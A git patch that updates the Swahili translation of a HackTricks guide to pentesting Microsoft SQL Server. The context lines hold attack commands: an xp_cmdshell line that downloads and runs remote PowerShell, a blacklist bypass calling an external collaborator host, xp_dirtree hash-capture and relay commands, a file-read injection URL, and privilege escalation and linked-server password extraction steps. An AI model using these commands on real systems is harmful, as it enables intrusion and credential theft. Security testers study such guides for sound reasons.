From 7b1d7c1c2ac67d2f7b41553c86e7474c3db3cdfc Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 17 Jun 2024 09:32:04 +0000 Subject: [PATCH] Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql- --- .../README.md | 88 +++++++++---------- 1 file changed, 44 insertions(+), 44 deletions(-) diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index a159ff85f..b4afd1289 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md @@ -2,15 +2,15 @@
-Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhack AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
@@ -26,19 +26,19 @@ Njia nyingine za kusaidia HackTricks: Kutoka [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server): -> **Microsoft SQL Server** ni **mfumo wa usimamizi wa database wa kihusiano** uliyoendelezwa na Microsoft. Kama seva ya database, ni bidhaa ya programu yenye kazi kuu ya kuhifadhi na kurejesha data kama inavyotakiwa na programu nyingine—ambazo zinaweza kukimbia kwenye kompyuta ile ile au kwenye kompyuta nyingine kwenye mtandao (ikiwa ni pamoja na Mtandao).\\ +> **Microsoft SQL Server** ni **mfumo wa usimamizi wa database wa kihusiano** uliyoendelezwa na Microsoft. Kama seva ya database, ni bidhaa ya programu yenye kazi kuu ya kuhifadhi na kurejesha data kama inavyotakiwa na programu nyingine—ambazo zinaweza kukimbia kwenye kompyuta ileile au kwenye kompyuta nyingine kupitia mtandao (ikiwa ni pamoja na Mtandao).\\ -**Bandari ya chaguo:** 1433 +**Bandari ya default:** 1433 ``` 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM ``` ### **Majedwali ya Mfumo wa MS-SQL ya Ufafanuzi** -* **Database ya msingi (master)**: Hii ni database muhimu kwani inakamata maelezo yote ya kiwango cha mfumo kwa kipengee cha SQL Server. +* **Database ya msingi**: Hii ni database muhimu kwani inakamata maelezo yote ya kiwango cha mfumo kwa kifaa cha SQL Server. * **Database ya msdb**: SQL Server Agent hutumia database hii kusimamia ratiba za tahadhari na kazi. -* **Database ya model**: Inafanya kazi kama kielelezo kwa kila database mpya kwenye kipengee cha SQL Server, ambapo mabadiliko yoyote kama ukubwa, usanidi wa lugha, mfano wa kupona, na zaidi huigwa katika databases zilizoundwa hivi karibuni. -* **Database ya Rasilimali (Resource)**: Database isiyoweza kuhaririwa ambayo ina vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vimehifadhiwa kimwili kwenye database ya Rasilimali, kwa mantiki vinaonyeshwa kwenye schema ya sys ya kila database. -* **Database ya tempdb**: Inatumika kama eneo la kuhifadhi la muda kwa vitu vya muda au seti za matokeo ya kati. +* **Database ya mfano**: Inafanya kazi kama kielelezo kwa kila database mpya kwenye kifaa cha SQL Server, ambapo mabadiliko yoyote kama ukubwa, usanidi, mfano wa kupona, na zaidi yanafanana katika databases zilizoundwa hivi karibuni. +* **Database ya Rasilimali**: Database isiyoweza kuhaririwa ambayo inahifadhi vitu vya mfumo vinavyokuja na SQL Server. Vitu hivi, ingawa vimehifadhiwa kimwili kwenye database ya Rasilimali, kwa mantiki vinaonyeshwa kwenye schema ya sys ya kila database. +* **Database ya tempdb**: Inafanya kama eneo la kuhifadhi la muda kwa vitu vya muda au seti za matokeo ya kati. ## Uthibitishaji @@ -152,14 +152,14 @@ SELECT * FROM sysusers ``` #### Pata Ruhusa -1. **Inayoweza Kusimbwa:** Imetajwa kama rasilimali zinazosimamiwa na SQL Server kwa udhibiti wa ufikiaji. Hizi hugawanywa katika: -* **Server** - Mifano ni pamoja na maktaba za data, kuingia, mwisho, vikundi vya upatikanaji, na majukumu ya seva. -* **Database** - Mifano hujumuisha jukumu la maktaba ya data, majukumu ya programu, schema, vyeti, katalogi za maandishi kamili, na watumiaji. -* **Schema** - Inajumuisha meza, maoni, taratibu, kazi, visawe, n.k. -2. **Ruhusa:** Zinahusishwa na inayoweza kusimbwa ya SQL Server, ruhusa kama vile ALTER, CONTROL, na CREATE zinaweza kutolewa kwa mkuu. Usimamizi wa ruhusa hufanyika kwa viwango viwili: -* **Kiwanja cha Seva** kwa kutumia kuingia -* **Kiwanja cha Maktaba ya Data** kwa kutumia watumiaji -3. **Mkuu:** Istilahi hii inahusu kifaa ambacho kimetolewa ruhusa ya inayoweza kusimbwa. Wakuu kwa kiasi kikubwa ni pamoja na kuingia na watumiaji wa maktaba ya data. Udhibiti wa ufikiaji wa inayoweza kusimbwa hufanywa kupitia kutoa au kukataa ruhusa au kwa kuingiza kuingia na watumiaji katika majukumu yenye haki za ufikiaji. +1. **Inayoweza Kusimbwa:** Imetajwa kama rasilimali zinazosimamiwa na SQL Server kwa ajili ya kudhibiti ufikiaji. Hizi hufafanuliwa kama ifuatavyo: +* **Server** – Mifano ni pamoja na maktaba za data, logins, endpoints, vikundi vya upatikanaji, na majukumu ya seva. +* **Database** – Mifano hujumuisha majukumu ya maktaba za data, majukumu ya programu, schema, vyeti, katalogi za maandishi kamili, na watumiaji. +* **Schema** – Inajumuisha meza, maoni, taratibu, kazi, visawe, n.k. +2. **Ruhusa:** Zinahusishwa na inayoweza kusimbwa ya SQL Server, ruhusa kama vile ALTER, CONTROL, na CREATE zinaweza kutolewa kwa mada. Usimamizi wa ruhusa hufanyika kwa viwango viwili: +* **Kiwanja cha Seva** kwa kutumia logins +* **Kiwanja cha Maktaba za Data** kwa kutumia watumiaji +3. **Mada:** Istilahi hii inahusu kwa kawaida kwa kifaa ambacho kimetolewa ruhusa ya inayoweza kusimbwa. Madaraka kuu yanajumuisha logins na watumiaji wa maktaba za data. Udhibiti wa ufikiaji wa inayoweza kusimbwa hufanywa kupitia kutoa au kukataa ruhusa au kwa kuwaingiza logins na watumiaji katika majukumu yenye haki za ufikiaji. ```sql # Show all different securables names SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT); @@ -217,9 +217,9 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1 # Bypass blackisted "EXEC xp_cmdshell" '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` -### Pora hash ya NetNTLM / Shambulizi la kurelayi +### Pora Hashi ya NetNTLM / Shambulio la Kurelayi -Unapaswa kuanzisha **seva ya SMB** ili kukamata hash inayotumiwa katika uwakiki (`impacket-smbserver` au `responder` kwa mfano). +Unapaswa kuanzisha **seva ya SMB** ili kukamata hashi inayotumiwa katika uwakiki (`impacket-smbserver` au `responder` kwa mfano). ```bash xp_dirtree '\\\any\thing' exec master.dbo.xp_dirtree '\\\any\thing' @@ -232,7 +232,7 @@ sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` {% hint style="warning" %} -Unaweza kuangalia ni nani (isipokuwa sysadmins) ana ruhusa ya kukimbia hizo kazi za MSSQL kwa: +Unaweza kuangalia ni nani (isipokuwa sysadmins) ana ruhusa ya kutekeleza hizo kazi za MSSQL kwa: ```sql Use master; EXEC sp_helprotect 'xp_dirtree'; @@ -293,7 +293,7 @@ https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\w ``` ### **RCE/Soma faili zinazotekeleza scripts (Python na R)** -MSSQL inaweza kuruhusu wewe kutekeleza **scripts katika Python na/au R**. Msimbo huu utatekelezwa na **mtumiaji tofauti** kuliko yule anayetumia **xp\_cmdshell** kutekeleza amri. +MSSQL inaweza kuruhusu wewe kutekeleza **scripts za Python na/au R**. Msimbo huu utatekelezwa na **mtumiaji tofauti** kuliko yule anayetumia **xp\_cmdshell** kutekeleza amri. Mfano wa kujaribu kutekeleza **'R'** _"Hellow World!"_ **haifanyi kazi**: @@ -344,17 +344,17 @@ Kwa **mfano zaidi** angalia [**chanzo cha asili**](https://blog.waynesheffield.c Inawezekana **kupakia dll ya .NET ndani ya MSSQL na kazi za desturi**. Hata hivyo, hii **inahitaji ufikiaji wa `dbo`** hivyo unahitaji uhusiano na database **kama `sa` au jukumu la Msimamizi**. -[Fuata kiungo hiki](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) kuona mfano. +[**Fuata kiungo hiki**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp) kuona mfano. -### Njia Nyingine za RCE +### Njia nyingine za RCE -Kuna njia nyingine za kupata utekelezaji wa amri, kama vile kuongeza [taratibu za kuhifadhiwa zilizoziduliwa](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [Majumuisho ya CLR](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [Kazi za SQL Server Agent](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), na [maandishi ya nje](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). +Kuna njia nyingine za kupata utekelezaji wa amri, kama vile kuongeza [taratibu za kuhifadhiwa zilizoziduliwa](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [Mkusanyiko wa CLR](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [Kazi za SQL Server Agent](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), na [maandishi ya nje](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). -## Ukarabati wa Mamlaka wa MSSQL +## Ukarabati wa Hadhi wa MSSQL ### Kutoka db\_owner hadi sysadmin -Ikiwa **mtumiaji wa kawaida** anapewa jukumu la **`db_owner`** juu ya **database iliyo milikiwa na mtumiaji wa usimamizi** (kama vile **`sa`**) na database hiyo imeboreshwa kama **`trustworthy`**, mtumiaji huyo anaweza kutumia mamlaka haya kwa **privesc** kwa sababu ya **taratibu zilizohifadhiwa** zilizoundwa hapo ambazo zinaweza **kutekelezwa** kama mmiliki (**msimamizi**). +Ikiwa **mtumiaji wa kawaida** anapewa jukumu la **`db_owner`** juu ya **database iliyo na mmiliki wa admin** (kama vile **`sa`**) na database hiyo imeboreshwa kama **`trustworthy`**, mtumiaji huyo anaweza kutumia vibali hivi kwa **privesc** kwa sababu taratibu zilizohifadhiwa zilizoundwa hapo zinaweza **kutekelezwa** kama mmiliki (**admin**). ```sql # Get owners of databases SELECT suser_sname(owner_sid) FROM sys.databases @@ -392,7 +392,7 @@ Unaweza kutumia moduli ya **metasploit**: ```bash msf> use auxiliary/admin/mssql/mssql_escalate_dbowner ``` -Au skripti ya **PS**: +Au script ya **PS**: ```powershell # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/Invoke-SqlServer-Escalate-Dbowner.psm1 Import-Module .Invoke-SqlServerDbElevateDbOwner.psm1 @@ -416,10 +416,10 @@ SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') ``` {% hint style="info" %} -Ikiwa unaweza kujifanya kuwa mtumiaji, hata kama yeye si sysadmin, unapaswa kuangalia **i**ki **mtumiaji ana ufikiaji** wa **databases** au seva zilizounganishwa. +Ikiwa unaweza kujifanya kuwa mtumiaji, hata kama yeye si sysadmin, unapaswa kuangalia **i**ki mtumiaji ana **upatikanaji** wa **databases** au seva zilizounganishwa. {% endhint %} -Tafadhali kumbuka kwamba mara tu unapokuwa sysadmin unaweza kujifanya kuwa mwingine yeyote: +Tafadhali kumbuka kwamba mara tu unapokuwa sysadmin unaweza kujifanya kuwa mtumiaji mwingine yeyote: ```sql -- Impersonate RegUser EXECUTE AS LOGIN = 'RegUser' @@ -429,7 +429,7 @@ SELECT IS_SRVROLEMEMBER('sysadmin') -- Change back to sa REVERT ``` -Unaweza kutekeleza shambulizi hili kwa moduli ya **metasploit**: +Unaweza kutekeleza shambulio hili kwa moduli ya **metasploit**: ```bash msf> auxiliary/admin/mssql/mssql_escalate_execute_as ``` @@ -439,27 +439,27 @@ au kwa script ya **PS**: Import-Module .Invoke-SqlServer-Escalate-ExecuteAs.psm1 Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuser1 -SqlPass MyPassword! ``` -## Kutumia MSSQL kwa Uthabiti +## Kutumia MSSQL kwa Uimara [https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/) -## Kuchimba Nywila kutoka kwa Seva za SQL Server Zilizounganishwa +## Kuchota Nywila kutoka kwa Seva za SQL Server Zilizounganishwa -Mshambuliaji anaweza kuchimba nywila za Seva za SQL Server Zilizounganishwa kutoka kwa Mifano ya SQL na kuzipata kwa maandishi wazi, hivyo kumpa mshambuliaji nywila ambazo zinaweza kutumika kupata msingi mkubwa zaidi kwenye lengo. Script ya kuchimba na kufichua nywila zilizohifadhiwa kwa Seva Zilizounganishwa inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) +Mshambuliaji anaweza kuchota nywila za Seva za SQL Server Zilizounganishwa kutoka kwa Mifano ya SQL na kuzipata kwa maandishi wazi, hivyo kupata nywila za mshambuliaji ambazo zinaweza kutumika kupata msingi mkubwa zaidi kwenye lengo. Script ya kuchota na kufichua nywila zilizohifadhiwa kwa Seva Zilizounganishwa inaweza kupatikana [hapa](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) -Baadhi ya mahitaji na mipangilio lazima ifanywe ili kuch exploit hii ifanye kazi. Kwanza kabisa, lazima uwe na Haki za Msimamizi kwenye mashine, au uwezo wa kusimamia Mipangilio ya Seva ya SQL. +Baadhi ya mahitaji na mipangilio lazima ifanywe ili kashfa hii ifanye kazi. Kwanza kabisa, lazima uwe na Haki za Msimamizi kwenye mashine, au uwezo wa kusimamia Mipangilio ya Seva ya SQL. Baada ya kuthibitisha ruhusa zako, unahitaji kusanidi mambo matatu, ambayo ni haya yafuatayo: 1. Wezesha TCP/IP kwenye mifano ya SQL Server; -2. Ongeza Parameta ya Kuanza, katika kesi hii, bendera ya kufuatilia itaongezwa, ambayo ni -T7806. +2. Ongeza Parameter ya Kuanza, katika kesi hii, bendera ya kufuatilia itaongezwa, ambayo ni -T7806. 3. Wezesha uunganisho wa msimamizi wa mbali. -Ili kiotomatiki mipangilio hii, [hii repository](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) ina hati zinazohitajika. Mbali na kuwa na hati ya powershell kwa kila hatua ya usanidi, repository pia ina script kamili ambayo inachanganya hati za usanidi na uchimbaji na ufichuaji wa nywila. +Ili kiotomatiki mipangilio hii, [hifadhi hii](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) ina hati zinazohitajika. Mbali na kuwa na hati ya powershell kwa kila hatua ya usanidi, hifadhi pia ina script kamili ambayo inachanganya hati za usanidi na uchimbaji na ufichuaji wa nywila. -Kwa habari zaidi, tazama viungo vifuatavyo kuhusu shambulio hili: [Kufichua Nywila za Seva za Database za MSSQL](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) +Kwa habari zaidi, tazama viungo vifuatavyo kuhusu shambulio hili: [Kufichua Nywila za Seva za Viungo vya Msingi wa MSSQL](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/) -[Kutatua Matatizo ya Uunganisho wa Msimamizi wa Kujitolea wa SQL Server](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) +[Kutatua Matatizo ya Uunganisho wa Msimamizi wa Kujitolea wa Seva ya SQL](https://www.mssqltips.com/sqlservertip/5364/troubleshooting-the-sql-server-dedicated-administrator-connection/) ## Kupandisha Hadhi ya Mamlaka ya Kienyeji @@ -486,13 +486,13 @@ Huenda utaweza **kupanda hadhi hadi Msimamizi** kufuata moja ya kurasa hizi 2: * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) * [https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/](https://www.netspi.com/blog/technical/network-penetration-testing/hacking-sql-server-stored-procedures-part-2-user-impersonation/) * [https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/](https://www.netspi.com/blog/technical/network-penetration-testing/executing-smb-relay-attacks-via-sql-server-using-metasploit/) -* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) **Kikundi cha Usalama cha Kujaribu Kwa Bidii** +* [https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/) **Kikundi cha Usalama wa Kujaribu Kwa Bidii**
{% embed url="https://discord.gg/tryhardsecurity" %} -*** +*** ## Amri za Kiotomatiki za HackTricks ``` @@ -556,10 +556,10 @@ Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {I Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! * Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee * **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.